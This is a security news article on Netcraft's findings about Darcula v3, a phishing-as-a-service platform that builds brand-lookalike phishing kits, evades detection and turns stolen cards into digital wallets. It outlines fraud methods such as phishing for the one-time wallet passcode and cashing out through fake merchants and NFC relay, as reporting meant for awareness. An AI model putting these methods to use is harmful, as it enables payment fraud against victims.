Darcula allows tech-illiterate crooks to create, deploy DIY phishing kits targeting any brand
A new, improved version of Darcula, a cat-themed phishing-as-a-service (PhaaS) platform aimed at serving Chinese-speaking criminals, will be released this month and will allow malicious users to create customized phishing kits to target a wider variety of brands than ever before, Netcraft researchers are warning.
Even users who have gotten wise to the fake “missed package” or “package confirmation” notices from their national post or delivery services may not be ready the variety of phishing lures that may be coming their way.
The Darcula platform makes phishing easy
By automating some of the required steps, Darcula makes it easy for technically inexperienced criminals to launch phishing campaigns.
The current version of the platform offers pre-built phishing kits for targeting users of over 200 brands worldwide.
The biggest innovation baked into the soon to be released Darcula v3 is the ability for any user to generate a phishing kit for any brand, the researchers discovered.
All the user needs to do is to access the platform’s interface, insert the URL of the brand they want to impersonate, and the platform exports the HTML and all required assets to create lookalike phishing pages.
Users can choose which HTML element to replace and which type of phishing content to inject, and can restyle the phishing form to match the look and feel of the branded page.
An injected credit card form, with some of the text machine-translated into English. (Source: Netcraft)
The platform is able to create separate pages to perfect the illusion and maximize the extraction of information from targets: an initial lure page, a page that asks them to input their personal information and payment card info, and a page that asks them to enter the two-factor authentication code.
The phishing platform creates a “.cat-page” bundle containing all those pages, which can be uploaded to the darcula admin panel and can then be used to launch phishing campaigns.
“The new admin panel also provides fraudsters a simplified user interface for managing credit cards, stolen credentials, active campaigns, and other details,” the researchers explained.
“These dashboards are not a crudely developed PHP script either — they are built on enterprise-grade systems including Docker, Node, React, SQLite, and various third-party NPM libraries. This attention to detail isn’t necessarily an effort to legitimize darcula but rather, make the experience easier and more accessible, just like any other SaaS platform.”
The phishing messages sent via Darcula – usually iMessages and Google Messages (which is based on the RCS standard) – can be sent out in bulk, either via “mass sender” scripts or device farms.
The platform is also able to implement advanced deception techniques to prevent/delay the discovery of campaigns. For example, web crawlers can be blocked, and so can access to the pages via non-mobile devices or from IP addresses known to belong to cybersecurity companies.
How the stolen payment information is leveraged by criminals
Darcula v3 can leverage the stolen card details to generate an image of the victim’s card, which makes it easier for crooks add them to a digital wallet by simply scanning the image. (Researchers have found that even cards reported as stolen can be linked to crooks’ wallets.)
Example of a virtually-generated card from stolen card details (Source: Netcraft)
“These cards are often loaded to burner phones and then sold by darcula criminals. This behavior has been confirmed by fraudsters who publicize burner phones pre-loaded with up to 20 stolen cards per device via a Telegram chat adjacent to darcula,” Netcraft researchers noted.
Reporter Brian Krebs has recently illustrated how the adding of stolen cards to digital wallets usually happens.
“People who enter their payment card data at one of these sites will be told their financial institution needs to verify the small transaction by sending a one-time passcode to the customer’s mobile device. In reality, that code will be sent by the victim’s financial institution to verify that the user indeed wishes to link their card information to a mobile wallet,” he explained.
“If the victim then provides that one-time code, the phishers will link the card data to a new mobile wallet from Apple or Google, loading the wallet onto a mobile phone that the scammers control.”
Citing SecAlliance security researcher Ford Merrill, Krebs further described how criminals then used those cards/wallets to steal money by:
- Setting up fake e-commerce businesses on Stripe or Zelle and making transactions through them
- Performing “Tap-to-pay” on point-of-sale (PoS) terminals they’ve obtained
- Using an Android app that can relay valid NFC-enabled tap-to-pay transactions from phones located across the globe, either to pay via a PoS terminal or take money out of ATMs